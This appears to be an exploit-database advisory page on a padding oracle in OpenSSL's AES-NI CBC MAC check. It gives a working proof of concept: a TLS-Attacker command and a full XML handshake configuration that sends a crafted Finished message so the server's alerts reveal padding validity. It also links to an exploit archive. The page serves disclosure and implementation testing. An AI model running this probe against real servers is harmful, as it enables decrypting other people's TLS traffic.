OpenSSL Padding Oracle in AES-NI CBC MAC Check

2016.05.05

Credit: Juraj Somorovsky

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

 
TLS-Attacker:
https://github.com/RUB-NDS/TLS-Attacker
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39768.zip
 
 
You can use TLS-Attacker to build a proof of concept and test your implementation. You just start TLS-Attacker as follows:
java -jar TLS-Attacker-1.0.jar client -workflow_input rsa-overflow.xml -connect $host:$port
 
The xml configuration file (rsa-overflow.xml) looks then as follows:
 
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workflowTrace>
    <protocolMessages>
        <ClientHello>
            <messageIssuer>CLIENT</messageIssuer>
            <includeInDigest>true</includeInDigest>
            <extensions>
                <EllipticCurves>
                    <supportedCurvesConfig>SECP192R1</supportedCurvesConfig>
                    <supportedCurvesConfig>SECP256R1</supportedCurvesConfig>
                    <supportedCurvesConfig>SECP384R1</supportedCurvesConfig>
                    <supportedCurvesConfig>SECP521R1</supportedCurvesConfig>
                </EllipticCurves>
            </extensions>
            <supportedCompressionMethods>
                <CompressionMethod>NULL</CompressionMethod>
            </supportedCompressionMethods>
            <supportedCipherSuites>
                <CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA</CipherSuite>
                <CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA</CipherSuite>
                <CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA256</CipherSuite>
                <CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA256</CipherSuite>
            </supportedCipherSuites>
        </ClientHello>
        <ServerHello>
            <messageIssuer>SERVER</messageIssuer>
        </ServerHello>
        <Certificate>
            <messageIssuer>SERVER</messageIssuer>
        </Certificate>
        <ServerHelloDone>
            <messageIssuer>SERVER</messageIssuer>
        </ServerHelloDone>
        <RSAClientKeyExchange>
            <messageIssuer>CLIENT</messageIssuer>
        </RSAClientKeyExchange>
        <ChangeCipherSpec>
            <messageIssuer>CLIENT</messageIssuer>
        </ChangeCipherSpec>
        <Finished>
            <messageIssuer>CLIENT</messageIssuer>
            <records>
            <Record>
            <plainRecordBytes>
                <byteArrayExplicitValueModification>
                     <explicitValue>
  3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F
  3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F
                     </explicitValue>
                </byteArrayExplicitValueModification>
            </plainRecordBytes>
            </Record>
            </records>
        </Finished>
        <ChangeCipherSpec>
            <messageIssuer>SERVER</messageIssuer>
        </ChangeCipherSpec>
        <Finished>
            <messageIssuer>SERVER</messageIssuer>
        </Finished>
    </protocolMessages>
</workflowTrace>
 
It looks to be complicated, but it is just a configuration for a TLS handshake used in TLS-Attacker, with an explicit value for a plain Finished message (32 0x3F bytes). If you change the value in the Finished message, you will see a different alert message returned by the server.

References:

https://github.com/RUB-NDS/TLS-Attacker

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39768.zip

http://web-in-security.blogspot.ca/2016/05/curious-padding-oracle-in-openssl-cve.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

OpenSSL Padding Oracle in AES-NI CBC MAC Check

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.